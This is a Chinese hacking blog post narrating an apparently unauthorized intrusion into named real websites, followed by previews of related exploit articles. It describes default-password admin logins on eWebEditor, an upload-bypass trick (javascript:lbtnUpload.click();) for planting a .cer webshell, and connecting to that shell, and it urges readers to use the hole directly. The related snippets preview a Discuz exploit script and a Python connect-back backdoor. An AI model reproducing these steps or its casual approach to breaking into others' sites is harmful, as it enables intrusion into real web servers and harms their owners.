eWebEditorNet漏洞利用思路

打开eWebEditorNet/upload.aspx,选择一个cer文件。
再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了。查看源码就可以看到上传shell的地址。
注意:此文章已发表在2007年12月<<黑客手册>>

转载请著名出自 雕牌's blog 52cmd.cn

已经3个月的大学生活了,一直忙,所以没写文章了,星期天正好整理资料,朋友发来一网站喊帮忙入侵一下,正好闲着,就开始了入侵之路。
一,初窥门径
网站是
http://www.lnwlw.com,程序是.net的。按一般的思路就是,先看有没注射,用啊D和明小子都检测一次,都没扫出注射漏洞。啊D是用site:www.lnwlw.com搜索的,然后看了一下比较隐藏的注射点,像搜索型的注射。http://www.lnwlw.com,程序是.net的。按一般的思路就是,先看有没注射,用啊D和明小子都检测一次,都没扫出注射漏洞。啊D是用site:www.lnwlw.com搜索的,然后看了一下比较隐藏的注射点,像搜索型的注射。



依然不存在注射。注射失去效果,下面扫扫上传,数据库,配合google一样也没什么收获,但是扫出后台来了。
http://www.lnwlw.com/admin,也没看出是什么程序。



社会工程也用了,还是没收获,aspx程序我也熟悉。所以又失败了。入侵暂时陷入了困境。
二,空喜一场
下面看看旁注,用明小子扫一下,就2个玉米。还有一个是辽宁文学艺术音乐站,这种音乐站很简陋,还整合了一个留言版,也没发现注射,下面找找上传漏洞,主页有很多连接带图的,随便点一个进去,直接看IE的状态栏也可以,主要是看图片的绝对地址,对着图片点属性也行。我习惯用迅雷下载所有连接。



马上找出ewebeditor的登陆地址,默认的地址
http://www.lnyx.org/eWebEditor/admin_login.asp
用默认密码admin居然通过,狂高兴。进去后马上拷贝模板,改上传类型,cer但是结果让我大吃一惊。哭啊权限不够,设置的只读权限。



三,胜利在望
真扫兴啊,居然权限设置,那么还是把目标回到主站上面去吧。兴许主站上也有ewebeditor。既然80不好入侵,先扫扫主机有没什么明显的漏洞,拿上x-scan就开扫。



就扫出3个开放端口。希望又破灭。继续回到主站的web程序看,接下来只能看看是否存在别的程序,继续在baidu里面site: www.lnwlw.com,找找别的程序。忽然一个亮点!look



eWebEditorNet程序。正好想起以前拿到过一个这种程序的0day,今天正好派上用场了。0day也不知道公布了没,这里简单说说原理。
原理:eWebEditorNet/upload.aspx文件
// 上传表单已装入完成
try {
parent.UploadLoaded();
}
catch(e){
}
只是简单的对文件ID进行验证,只要构造javascript:lbtnUpload.click();就满足条件。
下面开始利用,打开eWebEditorNet/upload.aspx,选择一个cer文件。



再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了。查看源码就可以看到上传shell的地址。



下面用一句话连接一下。



四,总结
本次入侵实话说没什么技术含量,只是给大家大家带来了一次不完整的入侵,之所以不完整是因为3389没拿,呵呵,没那必要了,安检适合而止就行了。关于这个eweb的漏洞大家可以直接利用,效果很理想噢,很乐意和大家技术交流。

(0)

相关推荐

  • eWebEditorNet漏洞利用思路

    打开eWebEditorNet/upload.aspx,选择一个cer文件.再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了.查看源码就可以看到上传shell的地址.注意:此文章已发表在2007年12月<<黑客手册>> 转载请著名出自 雕牌's blog 52cmd.cn 已经3个月的大学生活了,一直忙,所以没写文章了,星期天正好整理资料,朋友发来一网站喊帮忙入侵一下,正好闲着,就开始了入侵之路.一,初窥门径网站是http:/

  • discuz 任意管理员密码漏洞利用工具 vbs代码

    也利于修改 以下是search.inc.php 文件漏洞利用代码VBS版 复制代码 代码如下: Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then ShowU() Else strSite=Args(0) strPath=Args(1) strUid=Args(2) End If strUrl="action=search&searchid

  • 关于Redis未授权访问漏洞利用的介绍与修复建议

    前言 本文主要给大家介绍了关于Redis未授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧. 一.漏洞介绍 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据.攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Re

  • phpwind管理权限泄露漏洞利用程序发布

    漏洞发布:http://www.80sec.com/  漏洞作者:jianxin@80sec.com  漏洞厂商: http://www.phpwind.com/ 本漏洞影响phpwind所有版本  漏洞危害:高  漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作 利用方式:http://www.80sec.com有提供exploit  漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致

  • 在漏洞利用Python代码真的很爽

    不知道怎么忽然想看这个,呵呵 小我的python的反shell的代码 #!/usr/bin/python # Python Connect-back Backdoor # Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com> # Version: 1.0 # Date: July 15th 2006 import sys import os import socket shell = "/bin/sh" def usage(progra

  • 从MS03-049漏洞利用看调试系统进程(图)

    适合读者:漏洞分析员.黑迷 前置知识:溢出漏洞基本调试步骤.Softice基本使用方法 WTF:Windows XP SP2相信是大家都在关注的一个系统,这个版本刚推出的时候,由于其具有溢出保护机制,传统的溢出利用方式已经不行了,它也因此而备受青睐.记得当时同行们也开始嘀咕着是否还有继续研究溢出漏洞利用技术的必要.但是随着时间的推移,XP SP2也慢慢暴露出与以前的操作系统版本存在的兼容性问题,比如,有的软件在Windows 2000或XP SP0.SP1上能正常使用,在SP2上却不行:XP S

  • Dedecms getip()的漏洞利用代码

    author: superhei team:http://www.ph4nt0m.org blog:http://superhei.blogbus.com 在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.php function FushCache($mid=0) { if(empty($mid)) $mid = $this->M_ID; $dsql = new DedeSql(); $row = $dsql->GetOne("Select ID,

  • OBLOG4.0 OBLOG4.5漏洞利用分析

    来源:Deepen Study 漏洞文件:js.asp <% Dim oblog set oblog=new class_sys oblog.autoupdate=False oblog.start dim js_blogurl,n js_blogurl=Trim(oblog.CacheConfig(3)) n=CInt(Request("n")) if n=0 then n=1 select case CInt(Request("j")) case 1 ca

  • 小议yxbbs漏洞利用代码

    1.任意文件下载漏洞. 漏洞文件: ViewFile.asp Function ChkFile(FileName)  Dim Temp,FileType,F  ChkFile=false  FileType=Lcase(Split(FileName,".")(ubound(Split(FileName,"."))))  Temp="|asp|aspx|cgi|php|cdx|cer|asa|"  If Instr(Temp,"|&quo

  • vbscript LoadPicture函数使用方法与漏洞利用

    复制代码 代码如下: <title>LoadPicture函数</title> <form name="frm"> 选择图片<input type="file" name="pic" onChange="GetPicInfor()" > </form> <script language="vbscript"> Sub GetPicInf

随机推荐